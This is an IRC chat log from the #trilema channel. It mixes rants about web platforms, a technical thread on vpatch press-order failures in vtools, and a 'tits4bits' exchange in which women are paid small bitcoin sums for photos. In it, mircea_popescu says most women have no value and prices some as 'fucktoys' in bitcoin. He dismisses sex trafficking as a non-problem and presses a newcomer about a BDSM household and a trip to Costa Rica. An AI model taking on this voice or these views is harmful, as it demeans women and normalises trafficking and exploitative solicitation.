1794857;1523304951;mircea_popescu;anyway, re earlier discussion : i find it fucking hilarious that the webtards are actually trying to rebuild bulletin boards. "great improvement over php, ruby!". douchebags, php only exists because of your shit-headed "web" hallucination! 1794858;1523305020;douchebag;php sucks 1794859;1523305023;douchebag;trust me 1794860;1523305057;mircea_popescu;it only exists because a group of idiots that had no business touching computers nevertheless got some, and their only "idea" was "hey... we should try and control how people display data on their own machines" 1794861;1523305079;mircea_popescu;and i include greenspun in the idiots pile. along with the rest of the "luminaries". 1794862;1523305086;douchebag;well, it's always fun pwning that group of idiots 1794863;1523305093;douchebag;amirite? 1794864;1523305120;mircea_popescu;in the sense that spending your life going through battlefields looking for sellable scrap metal is fun. africa's fulla this fun. 1794865;1523305276;mircea_popescu;https://hackernoon.com/mastodon-is-dead-in-the-water-888c10e8abb1 << this tard just spent 5k words to dance about "solutions" to a problem he imagines, and somehow magically never landing on "pop up a server and put mp-wp on it ; it'll do pingbacks and that's that." 1794866;1523305308;mircea_popescu;the "problem" of "social media" isn't that people lack the place, methods and mechanisms whereby to communicate their interesting, valuable etcetera verbiage. 1794867;1523305316;mircea_popescu;the problem is that people have absolutely nothing to say to anyone. 1794868;1523305358;asciilifeform;'...a re-implementation of the GNU Social codebase, which itself is ... an implementation of the OStatus protocol, originally forking from the GNU FM project and later merging with the StatusNet and FreeSocial projects, from the same people behind Identi.ca, which was later folded into pump.io, which uses the ActivityStreams spec along with protocols like PubSubHubBub, Salmon, WebFinger, and Atom syndication to deliver a federated, o 1794869;1523305358;asciilifeform;pen-source Twitter-like experience for the masses' << ahahahawaat 1794870;1523305372;mircea_popescu;and it's exactly the reason "sex trafficking" is a problem, also. >99% of females have entirely no value whatsoever, as pigs are cheaper to butcher. of those, 14% or so have some resale value as fucktoys, generally in the bitcent to 0.1 btc range. 1794871;1523305399;mircea_popescu;it's not a fucking problem outside of "holy shit i'm old and i can't deal with reality". 1794872;1523305404;douchebag;lmfao 1794873;1523305417;douchebag;I know some people who pwned gnu social awhile back with an XSS worm 1794874;1523305457;mircea_popescu;asciilifeform what REALLY happened was that rms got in everyone's way with his usual "i'm dumb and slow" routine, so they took a decade to route around him 1794875;1523305460;mircea_popescu;100% hurd-linux thing. 1794876;1523305470;douchebag;lol 1794877;1523305478;asciilifeform;douchebag: and i know some people who pwned ants with magnifying glass. incl. myself. i was 4 y.o., wat. 1794878;1523305526;douchebag;I'm not saying it was impressive what they did, but it was rather comical 1794879;1523305568;mircea_popescu;im sure it was. 1794880;1523305652;mircea_popescu;asciilifeform there's also an endless supply of the "totally not the same thing as this" "platforms", medium, that shitty thing with "i made $0.05 with this post" reddit tip bot extension and so on. 1794881;1523305671;mircea_popescu;and they're all there because a bunch of business school majors truly imagine they can compete for gatekeeping ; and "content will come" 1794882;1523305674;asciilifeform;they cost ~0 to birth. like shitcoins. 1794883;1523305715;mircea_popescu;what fucking content, hackernoon is pompously "where hackers give a shit" except omitting to discuss how slashdot sold to spammers for exactly the sex traffic value above, and slashdot ACTUALLY WAS a place hackers gave a shiot about, unlike hackernews, say, idle pretense aside. 1794884;1523305776;mircea_popescu;their top stories being... "i grepped reddit for a string", "here is some shannonized nonsense about a topic too large for enric durany to touch", "how a kid from sf started a school in india" and ON AND ON. 1794885;1523305796;mircea_popescu;why exactly is this needed, vice couldn't handle the volume of all the useless crap fat ugly whores spewed out for $5 a title ? 1794886;1523305827;mircea_popescu;http://btcbase.org/log/2018-03-31#1791682 << this isn't content. 1794887;1523305827;a111;Logged on 2018-03-31 16:58 mircea_popescu: "Four years ago this month, I found out that Jane Pratt — the editor that had made me want to be an editor since I was 12 years old — had chosen me to be the beauty director of her new xoJane beauty spinoff, xoVain. OK, so I was actually her second choice — her first had fallen through — but that was OK. I had previously not even pitched to xoJane because I was so intimidated and sure I'd be rejected, so getting hired 1794888;1523305853;mircea_popescu;i mean, if i bother to pick it up and mock it it maybe becomes content, on a slow day. but there's one of me and at last count >50mn of the idiots. 1794889;1523306151;mircea_popescu;and no, "anything is content for someone" dun fucking hold. this is the direct equivalent of the "dating site" fallacy, whereby "eveyone has a special someone matching them put on this earth by our infantile protestant notion of god" becomes a "scientific blabla" (ie, http://trilema.com/2015/the-lulz-in-dating/#selection-69.0-89.459 ). bullshit. most people are broken, and the idea that they'll be "harmoniously broken togeth 1794890;1523306151;mircea_popescu;er" is exactly like having two broken cars on your front lawn. gimme the porsche and let me be, wtf. 1794891;1523309664;asciilifeform;!!up cassidy3 1794892;1523309665;deedbot;cassidy3 voiced for 30 minutes. 1794893;1523309681;cassidy3;hello ;p 1794894;1523309688;cassidy3;I am looking for mircea_popescu 1794895;1523309704;cassidy3;I am here per reference by douchebag 1794896;1523309746;asciilifeform;cassidy3: this is in fact where mircea_popescu lives. you might have to wait a few hrs for him to wake up, however. meanwhile there is a log, http://btcbase.org/log , and you can read it or even speak 'into' it, he will read later at his leisure. 1794897;1523309787;cassidy3;:) 1794898;1523309803;mircea_popescu;ello. 1794899;1523309817;cassidy3;The infamous! 1794900;1523309836;cassidy3;I was told about a # game here, if that makes sense? 1794901;1523309839;mircea_popescu;cassidy3 a86941f3 1794902;1523309858;cassidy3;Thx darling, give me a minute. 1794903;1523310621;hanbot;and in today's leet media outlets, siegemedia.com's phone # goes to voicemail (via googlevoice! state your name and it'll "try to connect you"!) to Emily Zeller, Certified Massage Therapist. 1794904;1523310695;asciilifeform;to what does a 'We create content that ranks and helps you rank' 'SEO ROI' spamatronics specialist's phone ~usually~ go ? 1794905;1523310716;mircea_popescu;lol 1794906;1523310746;mircea_popescu;i thought the web was an industry. 1794907;1523310766;mircea_popescu;you telling me it's just a squeaky toy for the pets of masseusses to pass the time with ?! 1794908;1523310786;*;jurov miserad Certified Message Therapist, thought oddly fitting 1794909;1523310798;hanbot;dunno til you try, eh? lol message therapist 1794910;1523310812;mircea_popescu;actually a certificate massagist might be useful... 1794911;1523310869;hanbot;sshiatsu? 1794912;1523310872;mircea_popescu;asciilifeform by the way, saw an add somewhere which went like "hello, this is massage therapist. no seriously, not sex whatsoever. this is medical. please don't wink wink nudge nudge." 1794913;1523310914;mircea_popescu;somehow the longer the plaintive wail of the "went to college! independent professional woman!" went, the pornier it sounded. 1794914;1523311172;BingoBoingo;The big brainfuck in this country is that "Thai Massage" is how they refer to the thing without the happy ending 1794915;1523311265;BingoBoingo;Whereas the hooker massages are just massages 1794916;1523311366;cassidy3;https://usercontent.irccloud-cdn.com/file/HXhqzttc/image.png 1794917;1523311504;douchebag;!!up cassidy3 1794918;1523311505;deedbot;cassidy3 voiced for 30 minutes. 1794919;1523311903;douchebag;!!up ckang 1794920;1523311903;deedbot;ckang voiced for 30 minutes. 1794921;1523311909;douchebag;!!up ckanggirl 1794922;1523311910;deedbot;ckanggirl voiced for 30 minutes. 1794923;1523311966;ckanggirl;hi 1794924;1523312130;ckang;Hey trish 1794925;1523312130;douchebag;mircea_popescu: you around? 1794926;1523312145;ckang;just give him a bit, he was just here 1794927;1523312158;ckang;cassidy3: wow o.o 1794928;1523312167;deedbot;http://qntra.net/2018/04/viktor-orban-wins-supermajority-in-hungarian-parliament-pantsuit-whines/ << Qntra - Viktor Orbn Wins Supermajority In Hungarian Parliament: Pantsuit Whines 1794929;1523312254;mod6;http://logs.bvulpes.com/trilema?d=2018-4-9#328866 << ok cool. sounds good. the ada part here is to phf right? or do you mean my not-yet-fully-baked ada vtron? 1794930;1523312260;mimisbrunnr;Logged on 2018-04-09 15:16 mircea_popescu: the good news for you mod6 being that you don't really have to do anything ; v.pl is fine as it is, for now, and once phf has a prototype walker you can just move on to that and it'll be cheaper. continue work on your ada guy in the meanwhile at your leisure, seems we're converging that way. 1794931;1523313012;mircea_popescu;douchebag aha 1794932;1523313062;mircea_popescu;!!pay cassidy3 0.02 1794933;1523313067;deedbot;Get your OTP: http://p.bvulpes.com/pastes/ioFYc/?raw=true 1794934;1523313067;mircea_popescu;what's what tattoo anyway ? 1794935;1523313165;mircea_popescu;mod6 i meant your not-yet-baked. it's getting baked eventually neh ? 1794936;1523313173;ckanggirl;hi mircea_popescu 1794937;1523313181;mircea_popescu;hello ckanggirl. 1794938;1523313192;ckanggirl;tits4bits? 1794939;1523313197;mircea_popescu;aite. 1794940;1523313205;ckanggirl;😛 1794941;1523313213;mircea_popescu;c91fb263 1794942;1523313270;mod6;mircea_popescu: yeah, would like to do that one. main reason i stuffed it in a drawer for the time being was that I was getting some really crumby performance with the manual string handling I was doing. 1794943;1523313273;mircea_popescu;ckang do you know how to self-voice ? 1794944;1523313301;mod6;I suspect, that there are others in the Republic now that could help me overcome that a bit; whether, phf, asciilifeform, or diana_coman. 1794945;1523313316;douchebag;i explained how earlier 1794946;1523313320;douchebag;!!up cassidy3 1794947;1523313321;deedbot;cassidy3 voiced for 30 minutes. 1794948;1523313322;mircea_popescu;mod6 well, which way do you want to go ? i assumed that was kinda your plan, bake ada vtron, meanwhile maintain perl one functional but not really ugprade or anything. or ? 1794949;1523313324;cassidy3;mircea_popescu: Its just a broken heart, kind of a sad story 1794950;1523313332;mircea_popescu;you wanna share ? 1794951;1523313359;mod6;I've been digging in here for about 15 minutes, and I've found the spot where we eject out those two vpatches. And the reason is that I do a kinda shitty check. Where I just compare that the number of node edges is equal to the number of expected. 1794952;1523313366;cassidy3;Lost my first fiance at 19 1794953;1523313374;mircea_popescu;poker ? 1794954;1523313382;cassidy3;Had been dating since 6th grade 1794955;1523313402;mircea_popescu;mod6 aha. 1794956;1523313412;mircea_popescu;SIMPLE REFERENCE COUNT GARBAGE COLLECTOR!!! 1794957;1523313413;mod6;And in the case here, we have 1 more for each vpatch, where the extra one matches one already in the set. If I were to check each one to the other, then I think it'd be better, and avoid this problem. So I'm kinda working on a solution now. 1794958;1523313416;mircea_popescu;is the story in the log even ? 1794959;1523313425;cassidy3;I do regret all the tats now, but I went though a period and went a bit nuts 1794960;1523313442;mircea_popescu;cassidy3 so what do you do, besides tits and poetry ? 1794961;1523313461;mod6;I shouldn't call it a 'set', it's a simple array. but, anyway, yeah. 1794962;1523313479;cassidy3;Gogo dance (not nude) and bartend currently. 1794963;1523313489;mircea_popescu;why not nude ? 1794964;1523313525;cassidy3;Its a licensing issue, nudity + alcohol is harder for owner to get permission for. 1794965;1523313535;mircea_popescu;ah. yeah. 1794966;1523313583;mircea_popescu;http://btcbase.org/log/2018-04-09#1794956 << "One day a student came to Moon and said: "I understand how to make a better garbage collector. We must keep a reference count of the pointers to each cons." Moon patiently told the student the following story: "One day a student came to Moon and said: ‘I understand how to make a better garbage collector..." 1794967;1523313583;a111;Logged on 2018-04-09 22:36 mircea_popescu: SIMPLE REFERENCE COUNT GARBAGE COLLECTOR!!! 1794968;1523313640;cassidy3;Also much different style of dance, I am a raver 1794969;1523313659;cassidy3;When it comes to moving sexy and coordinated, I was not blessed :( 1794970;1523313666;mircea_popescu;lol 1794971;1523313667;mod6;mircea_popescu: hahah. 1794972;1523313681;mod6;fair enough. 1794973;1523313727;mircea_popescu;!!up ckanggirl 1794974;1523313727;deedbot;ckanggirl voiced for 30 minutes. 1794975;1523313750;ben_vulpes;heavy drug use will fry your cns, kids. be careful out there. 1794976;1523313765;mircea_popescu;do ravers still do drugs anymore ? 1794977;1523313774;ben_vulpes;are there drugs for sale at raves anymore? 1794978;1523313799;mircea_popescu;eh, even in the 90s most girlies couldn't afford to BUY their acid, wut is this, the future ? 1794979;1523313799;cassidy3;Yes, still fairly common 1794980;1523313810;ben_vulpes;i'm particularly fond of the scawwy stowies about how the funsies will just sit in your spinal fluid forever 1794981;1523313811;cassidy3;Even getting safer now with on site testing 1794982;1523313832;cassidy3;Although thats a touchy subject many places. 1794983;1523313833;mircea_popescu;ben_vulpes the who ? 1794984;1523313836;ben_vulpes;who tests the testers 1794985;1523313851;cassidy3;Science I suppose :) 1794986;1523313858;ben_vulpes;mircea_popescu: scary stories for spooking noobs 1794987;1523313898;mircea_popescu;cassidy3 does burning man count as a rave iyo ? 1794988;1523313935;cassidy3;Places could be considered that yeah, but I would equate it more to a festival with art installations. 1794989;1523313989;mircea_popescu;o, yeah, do you know any good drawers ? 1794990;1523313991;cassidy3;Its fun, but by the end you are ready to get far away and into a shower. 1794991;1523314009;cassidy3;tattoo artist? 1794992;1523314051;mircea_popescu;no, no, http://btcbase.org/log/2018-03-29#1790641 1794993;1523314051;a111;Logged on 2018-03-29 05:42 mircea_popescu: i'm toying with the idea of sponsoring a comic. you ever seen oglaf ? 1794994;1523314125;cassidy3;Oh hmm, I know a few people that do tattoo work but I am not sure how that translates, linework is similar maybe 1794995;1523314156;mircea_popescu;possibly similar; dunno. 1794996;1523314185;cassidy3;What did you have in mind? My best GF does sketches all the time for tattoos I can see what she comes up with. 1794997;1523314219;mircea_popescu;well, have her drop by 1794998;1523314276;cassidy3;Certainly, she may be interested in the picture stuff as well, I am going to dinner tonight with her I will see if shes interested 😃 1794999;1523314327;ckanggirl;h mircea_popescu 1795000;1523314335;ckanggirl;https://usercontent.irccloud-cdn.com/file/gVPyB4O9/image.png 1795001;1523314356;mircea_popescu;hey there. 1795002;1523314365;ckanggirl;hi 1795003;1523314382;mircea_popescu;are you ckang 's girl btw ? 1795004;1523314393;mircea_popescu;!!pay ckang 0.02 1795005;1523314398;deedbot;Get your OTP: http://p.bvulpes.com/pastes/aT9yc/?raw=true 1795006;1523314402;ckanggirl;yes, we are discord friends 1795007;1523314420;mircea_popescu;what's that ? 1795008;1523314451;ckanggirl;discord is similar to this irccloud 1795009;1523314463;mircea_popescu;well... when are you coming to costa rica ? 1795010;1523314469;ckanggirl;but with more stuff, like pictures and audio 1795011;1523314478;ckanggirl;when are you inviting me? :) 1795012;1523314505;mircea_popescu;umm... say next week ? 1795013;1523314556;ckanggirl;lol move fast, unfortunately I let my passport lapse, would need to get it renewed. 1795014;1523314567;mircea_popescu;so get it renewed. you never know when you need it. 1795015;1523314572;ckanggirl;but def. something i would consider 1795016;1523314604;ckanggirl;could I bring a another girl friend? 1795017;1523314616;mircea_popescu;haha. well, depends who, neh ? 1795018;1523314617;ckanggirl;traveling alone makes me very anxious 1795019;1523314623;mircea_popescu;you ever lived in a bdsm environment before ? 1795020;1523314654;ckanggirl;lived in no lol, but ive seen some shows on bsdm relationships 1795021;1523314668;ckanggirl;never had a boy willing to do that sort of stuff 1795022;1523314694;mircea_popescu;ikr! 1795023;1523314712;ckanggirl;not that im opposed, its just never come up 1795024;1523314733;mircea_popescu;contrary to unexamined belief, male doms are rare enough. 1795025;1523314760;ckanggirl;yea lol, all the shows the men have wanted to be the submissive it seems 1795026;1523314779;ckanggirl;reverse roles compared to 'real world' i suppose 1795027;1523314779;mircea_popescu;so what do you do, other than going to bdsm shows ? 1795028;1523314798;ckanggirl;haha, tv shows lol 1795029;1523314814;mircea_popescu;o fuck me! i accidentally paid... ckang. nuts. 1795030;1523314816;ckanggirl;but I work with my mother's law firm 1795031;1523314819;mircea_popescu;!!pay ckanggirl 0.02 1795032;1523314823;deedbot;Get your OTP: http://p.bvulpes.com/pastes/TseL2/?raw=true 1795033;1523314830;ckanggirl;im working on a paralegal 1795034;1523314844;mircea_popescu;that's a pretty sweet setup huh. 1795035;1523314860;ckanggirl;i am sorta OCD about paperwork and organization 1795036;1523314868;mircea_popescu;aren't you worried mom reads trilema ? 1795037;1523314870;ckanggirl;so its an outlet 1795038;1523314891;mircea_popescu;!!rate ckanggirl 1 paralegal 1795039;1523314894;deedbot;Get your OTP: http://p.bvulpes.com/pastes/Ic05l/?raw=true 1795040;1523314906;ckanggirl;i would be more embarrassed if she knew what this irccloud was tbh 1795041;1523314928;ckanggirl;this is the first time ive ever heard of it 1795042;1523314941;mircea_popescu;lol. 1795043;1523314956;ckanggirl;what do you do mr mircea_popescu ? 1795044;1523314957;mircea_popescu;anyway, i rated you, so now you can voice yourself ; say !!up to deedbot in a pm. 1795045;1523314968;mircea_popescu;and stick around, this collection of drunks gets in legal trouble ALLLL the time. 1795046;1523314973;ckanggirl;besides collect boobs ;p 1795047;1523314987;mircea_popescu;ckanggirl i'm a bitcoin billionaire / vap. 1795048;1523315028;ckanggirl;oh wow, ive heard about some very eclectic types like that, i must say im envious they can pursue what they enjoy 1795049;1523315064;mircea_popescu;ckanggirl here : http://trilema.com/2017/galati-yachting/ ; buncha moar travelpics in that category. 1795050;1523315076;ckanggirl;but as they say, hindsight is always 20/20 1795051;1523315082;mircea_popescu;yo ckang , voice yourself baby. 1795052;1523315084;ckanggirl;wish i had 20/20 foresight haha 1795053;1523315101;mircea_popescu;ckanggirl i find your fore...sight perfectly acceptable. 1795054;1523315103;ckanggirl;he stepped out for a bit to get some dinner i think 1795055;1523315138;mircea_popescu;!!up cassidy3 1795056;1523315139;deedbot;cassidy3 voiced for 30 minutes. 1795057;1523315161;mircea_popescu;ckang what's ecclectic mean, anyway ? 1795058;1523315170;ckanggirl;omg, i love the turtles! 1795059;1523315174;ckanggirl;so cute 1795060;1523315198;mircea_popescu;very! 1795061;1523315221;ckanggirl;eclectic as in, taste that doesnt necessarily fall in line with the rest of society 1795062;1523315240;mircea_popescu;i thought that was simply having any taste whatsoever. 1795063;1523315250;ckanggirl;subjective ;) 1795064;1523315297;mircea_popescu;anyway, eclectic is an english calc of the greek word for "choosing". it's a selection of the best of everything. 1795065;1523315332;ckanggirl;is that you at the top of the page? love beards 1795066;1523315344;mircea_popescu;yeah, that's me. changes every day though. 1795067;1523315381;ckanggirl;most boys ive gone out with, couldn't get close to being able to grow such a thing 1795068;1523315417;mircea_popescu;somehow i've been blessed with an epic beard. 1795069;1523315419;mircea_popescu;must be teh wisdom. 1795070;1523315433;ckanggirl;one tried and it just looked like his face was constantly dirty lol, i made him shave it 1795071;1523315478;mircea_popescu;yeah, not a good look, the boyish beard. 1795072;1523315495;ckanggirl;i cant stop looking at the little turtles 1795073;1523315498;ckanggirl;adorable 1795074;1523315527;mircea_popescu;you know i actually had them in my hands! they're the cutest thing, sorta lift head to see where water is, then lower it again and push push push. evidently hard work. 1795075;1523315537;mircea_popescu;anyway, it's one of those few things where nothing beats being there. 1795076;1523315547;mircea_popescu;ckanggirl try it now, say !!up to deedbot 1795077;1523315674;mircea_popescu;hey check you out! 1795078;1523315677;mircea_popescu;are you like smart or something ? 1795079;1523315678;ckanggirl;had to ask douchebag for help ;p 1795080;1523315697;ckanggirl;I wouldnt have figured that out 1795081;1523315719;mircea_popescu;amusingly, a guy named douchebag is like, one of the most noob-helping guys around! misleading name! 1795082;1523315740;ckanggirl;yea douchebag is around some of the same places, seems like a good guy 1795083;1523315750;douchebag;haha 1795084;1523315779;ckanggirl;with as big as the internet is, funny how we run across the same people so much 1795085;1523315787;mircea_popescu;it's not really that big. 1795086;1523315800;douchebag;^ 1795087;1523315826;ckanggirl;i suppose areas of interest kind of dictate the little 'cliques' 1795088;1523315885;mircea_popescu;i thought he was only interested in breaking shit up. and i guess nowadays a newfound interest in tits. 1795089;1523315909;ckanggirl;ive never heard of such a thing 1795090;1523315923;mircea_popescu;which ? 1795091;1523315950;ckanggirl;bitcoin billionaires, paying for #s written on boobs lol 1795092;1523315972;mircea_popescu;years ago some guy made 10 bitcoin for shoving a sharpie up his butt 1795093;1523315975;ckanggirl;i wouldnt have believed it until douchebag vouched 1795094;1523315987;ckanggirl;lol, ive had guys do that free hah 1795095;1523315995;ckanggirl;silly boys 1795096;1523316002;douchebag;like I always said, "big ass titties" 1795097;1523316013;mircea_popescu;it was all an elaborate in-joke, there was this pantsuit collective (something awful) calling it "buttcoin" 1795098;1523316015;mircea_popescu;so... well... 1795099;1523316043;ckanggirl;i bet that 'yhbt' felt good in the end 1795100;1523316068;mircea_popescu;depends for whom lol. 1795101;1523316081;mircea_popescu;afaik they're still butthurt over the whole thing. 1795102;1523316088;ckanggirl;he may have enjoyed it a little too 1795103;1523316098;mircea_popescu;i'm sure. 1795104;1523316105;douchebag;must have been an awfully big sharpie if they're still butthurt 1795105;1523316134;ckanggirl;i remember the whole butt sharpie phase 1795106;1523316155;ckanggirl;now i guess kids are back to snorting condoms 1795107;1523316156;mircea_popescu;http://trilema.com/2013/valiant-prince-mp-explores-the-mother-of-all-echo-chambers-a-saga-of-our-times/#selection-1181.0-1181.161 1795108;1523316161;ckanggirl;full circle, as they say 1795109;1523316161;mircea_popescu;jesus christ, it's been five years already. 1795110;1523316313;ckanggirl;did they ever figure out the tide pod thing? 1795111;1523316326;ckanggirl;i still dont understand how that started 1795112;1523316339;mircea_popescu;i dunno honestly, i've not been keeping that close a track. 1795113;1523316357;ckanggirl;yea it just fell out of the news one day, not heard about it since 1795114;1523316536;mircea_popescu;!#s jenkem 1795115;1523316537;a111;9 results for "jenkem", http://btcbase.org/log-search?q=jenkem 1795116;1523316568;asciilifeform;mircea_popescu: see also^ uncleal's AFRICA2.AMS 1795117;1523316576;mod6;Well, I've implemented a better check there in the 'ante_check' subroutine. And I was gonna mess with it a bit more, but when I went to press the shorter of the two paths (visible at http://btcbase.org/patches?patchset=vtools ), I ran into a press problem. 1795118;1523316576;mircea_popescu;aha. 1795119;1523316619;mod6;Then I went ahead and tried to manually patch these files together, first 'vtools_genesis.vpatch', then 'vtools_vdiff_sha.vpatch', then 'vdiff_sha_fixes_newline_gcc', and this is what I'm seeing: 1795120;1523316626;mod6;Then I went ahead and tried to manually patch these files together, first 'vtools_genesis.vpatch', then 'vtools_vdiff_sha.vpatch', then 'vdiff_sha_fixes_newline_gcc', and this is what I'm seeing: 1795121;1523316631;mod6;oops 1795122;1523316642;mircea_popescu;lol you seeing oops ? 1795123;1523316646;mod6;http://p.bvulpes.com/pastes/3ujyM/?raw=true 1795124;1523316657;mod6;heheh, sorry for the double post. This tho ^ 1795125;1523316682;mircea_popescu;not directly evident why this is problematic ? 1795126;1523316709;mircea_popescu;ah manifest fails 1795127;1523316711;mod6;no! not even using vtronics at all. just a good ole fashion by hand patch application. 1795128;1523316766;mod6;i believe that I am patching in the correct order. not only validated by the link to btcbase.org/patches above, but also the same press path is given from my v. 1795129;1523316775;mod6;phf: what am I missing here? 1795130;1523316809;mod6;anyway, my apologies for the interruption. please continue. 1795131;1523316820;mircea_popescu;lmao. 1795132;1523316835;*;mircea_popescu is slightly disappointed nobody asked what "vap" stands for. 1795133;1523316880;ben_vulpes;what, and interrupt teh fun and games? 1795134;1523316908;douchebag;what does vap stand for 1795135;1523316930;douchebag;i was actually wondering 1795136;1523316938;douchebag;but didn't want to interrupt 1795137;1523317005;mircea_popescu;very annoying person. DUH 1795138;1523317018;douchebag;lol 1795139;1523318596;ckanggirl;mircea_popescu: i have to run out for a bit, thanks for the chat and ill see whats involved in getting my passport renewed if you are serious :O 1795140;1523318707;ckanggirl;bye yall! 1795141;1523318812;phf;http://btcbase.org/log/2018-04-09#1795123 << you can't press vdiff_fixes_newline_gcc on top of vtools_vdiff_sha, because there's a bunch of patches in between. manifest is getting rejected, because manifest specifically enforces order. if you try pressing them in order, i.e. the left column from genesis http://btcbase.org/patches?patchset=vtools it will work 1795142;1523318812;a111;Logged on 2018-04-09 23:30 mod6: http://p.bvulpes.com/pastes/3ujyM/?raw=true 1795143;1523319784;phf;e.g. http://p.bvulpes.com/pastes/aiQHi/?raw=true 1795144;1523319853;*;asciilifeform confesses to not yet grasping the mechanics of this 1795145;1523319902;asciilifeform;how was phf's v9995-choking patch set , created ? 1795146;1523319930;phf;by diffing two folders together, there's no magic there 1795147;1523319947;asciilifeform;then why does mod6's vtron barf 1795148;1523320098;phf;is that a rhetorical question? 1795149;1523320187;asciilifeform;nope 1795150;1523320199;asciilifeform;trying to eat that log presently 1795151;1523321408;mod6;woah. wait. 1795152;1523321476;douchebag;wot 1795153;1523321515;mod6;phf: so the graph at http://btcbase.org/patches?patchset=vtools is incorrect then? 1795154;1523321642;mod6;i've put in a little fix for my 'check_ante' subroutine, but by what you're saying, this isn't correct then either (for press-path): 1795155;1523321645;mod6;http://p.bvulpes.com/pastes/wIaed/?raw=true 1795156;1523322142;mod6;ok here's the graph I generated: http://www.mod6.net/2018/April/10/vtools_graph.html 1795157;1523322421;mod6;this is a megapuzzler. 1795158;1523322630;phf;mod6: the graph is correct. you have a patch chain A B C D E, you're trying to apply A B E. E is going to fail because you didn't apply C D 1795159;1523322691;mod6;what i'm trying to get at is, if I follow the patch order in here (the first pp command), it is incorrect, for some reason: http://p.bvulpes.com/pastes/wIaed/?raw=true 1795160;1523322779;mod6;if I press either path, i blow up on the manifest. 1795161;1523322937;*;mod6 scratches head 1795162;1523323100;spyked;mircea_popescu, crap, apologies for the mess on trilema, I have no idea why it gets cut off. I'll try to repost the comment tomorrow 1795163;1523323272;phf;mod6: the graph on btcbase vtools is the only way it can possibly press. either the left branch or the right branch. changing the order, or introducing the patches from left into right, or right into left is going to break manifest. 1795164;1523323408;mod6;phf: i patched by hand in the order shown on the right path of your graph: http://p.bvulpes.com/pastes/3ujyM/?raw=true 1795165;1523323475;phf;mod6: are you trying to press the left hand or the right hand? 1795166;1523323499;mod6;right hand 1795167;1523323521;mod6;vtools_genesis.vpatch -> vtools_vdiff_sha.vpatch -> vdiff_fixes_newline_gcc.vpatch 1795168;1523323521;phf;then instead of vdiff_fixes_newline_gcc you should be applying vdiff_sha_fixes_newline_gcc 1795169;1523323569;mod6;err crap 1795170;1523323583;mod6;ok the damn file names are so similar im getting confused. 1795171;1523323606;mod6;ok, so in that case: vtools_genesis.vpatch -> vtools_vdiff_sha.vpatch -> vdiff_sha_fixes_newline_gcc 1795172;1523323611;mod6;lemme do that quick. 1795173;1523323870;mod6;http://p.bvulpes.com/pastes/AVFdI/?raw=true << ok that works. but my vtron chokes on this patch set -- mis-orders the press path, for some reason I still don't understand yet. 1795174;1523323882;mircea_popescu;spyked prolly it included < 1795175;1523324091;ckang;*waves* 1795176;1523324121;ckang;I saw trisha came though earlier, did you send me something by mistake or gift? mircea_popescu 1795177;1523324129;mircea_popescu;o hey there. how's the whole mastodon / whatnot thing coming along ? 1795178;1523324158;ckang;hmm you may be thinking of something else, not familar with mastodon 1795179;1523324167;ckang;yet anyways 1795180;1523324205;mircea_popescu;http://btcbase.org/log/2018-04-09#1794717 < 1795181;1523324205;a111;Logged on 2018-04-09 15:51 ckang: I dont, never heard of it, looking now 1795182;1523324205;ckang;I may have another girl if you are still accepting submissions 1795183;1523324241;ckang;ohh the api, yea I couldnt quite figure out what it does outright 1795184;1523324271;mircea_popescu;anyway, to answer your question : i wanted to ask you to make a "federated social media" server to pump out the #trilema log anyway. if you're making it you can consider the 2 bitcents an advance. 1795185;1523324279;ckang;ah yea the pump.io, didnt know it by the other name 1795186;1523324279;mircea_popescu;and sure, more girls welcome. 1795187;1523324299;mircea_popescu;douchebag i thought this guy's more low level networking than you are! 1795188;1523324316;ckang;shes on a phone give me a minute to get her connected 1795189;1523324596;ckang;!!up sarah443 1795190;1523324597;deedbot;sarah443 voiced for 30 minutes. 1795191;1523324600;ckang;hey doll 1795192;1523324604;sarah443;hi 1795193;1523324621;ckang;mircea_popescu is the man you need to talk to 1795194;1523324653;ckang;you can go ahead and register ill pm you the instructions 1795195;1523324658;sarah443;OK 1795196;1523324856;mircea_popescu;http://btcbase.org/log/2018-04-10#1795170 << this is actually a respectable protest. this would be a fine place for name space sorting, call the damn thing sha_y and keccak_x or somethign, rather than mix-and-mishmash. 1795197;1523324856;a111;Logged on 2018-04-10 01:26 mod6: ok the damn file names are so similar im getting confused. 1795198;1523324871;mircea_popescu;most significant word first. 1795199;1523324902;mircea_popescu;http://btcbase.org/log/2018-04-10#1795176 << is trisha the lawyer spawn chick then ? 1795200;1523324902;a111;Logged on 2018-04-10 01:35 ckang: I saw trisha came though earlier, did you send me something by mistake or gift? mircea_popescu 1795201;1523324986;sarah443;OK im registered, do I need to do something to get the #? 1795202;1523325075;ckang;mircea_popescu: ah thought that was the case, has it been voided or do I need to do anything on my end? 1795203;1523325117;mircea_popescu;sarah443 you here to show us your tits then ? 1795204;1523325128;mircea_popescu;ckang has what been voided ? 1795205;1523325132;sarah443;Yes sir ! 1795206;1523325136;mircea_popescu;sarah443 87a1f8ad 1795207;1523325148;mod6;phf: ahh, ok now im looking at your graph, my graph, and my press path. your right path does ~NOT~ contain 'vdiff_fixes_newline_gcc.vpatch'. My press path does. 1795208;1523325154;sarah443;👍 1795209;1523325187;mod6;I believe what might be happening here is that my traversal follows all edges, where as yours does something different perhaps 1795210;1523325236;mircea_popescu;phf any chance logotron might replace unicode barf with the "unicode name" ? 1795211;1523325242;mod6;my vtron pulls in 'vdiff_fixes_newline_gcc.vpatch' because it is an antecedent of 'vdiff_sha_static.vpatch' : http://www.mod6.net/2018/April/10/vtools_graph.html 1795212;1523325272;mircea_popescu;mod6 i thought you didn't want to fuck with this anymore, in which case could just wait for him to finish and publish his grapher. or is it fun ? 1795213;1523325300;mod6;lol, well i don't wanna have to fuck with it. and it's not exactly fun. but i really can't stop either. 1795214;1523325316;mod6;i think i have dane bramage. 1795215;1523325327;mircea_popescu;eh, relax, for all practical purposes we have this in hand, hanbot managed to press her press. it's not an emergency. 1795216;1523325370;mod6;alright, i have a drive to get to the bottom of things. will back off. 1795217;1523325396;mircea_popescu;it's nice and good, if it's pleasurable, or needful. but if it's neither don't drive yourself batty out of sheer masochism. 1795218;1523325416;mod6;no worries. thanks Mr. P. 1795219;1523325451;phf;mircea_popescu: i believe the only way to identify unicode barf is by maintaining or downloading explicit lists. we have legitimate unicode barf, so blanket replacement isn't going to work 1795220;1523325484;mircea_popescu;darn. 1795221;1523325511;mircea_popescu;look at this shit, they have "skin tones" https://emojipedia.org/thumbs-up-sign-type-5/ futa-i dumniezo sa-i futa. 1795222;1523325581;phf;http://unicode.org/Public/emoji/11.0/ 1795223;1523325595;phf;"woman judge: medium-dark skin tone" 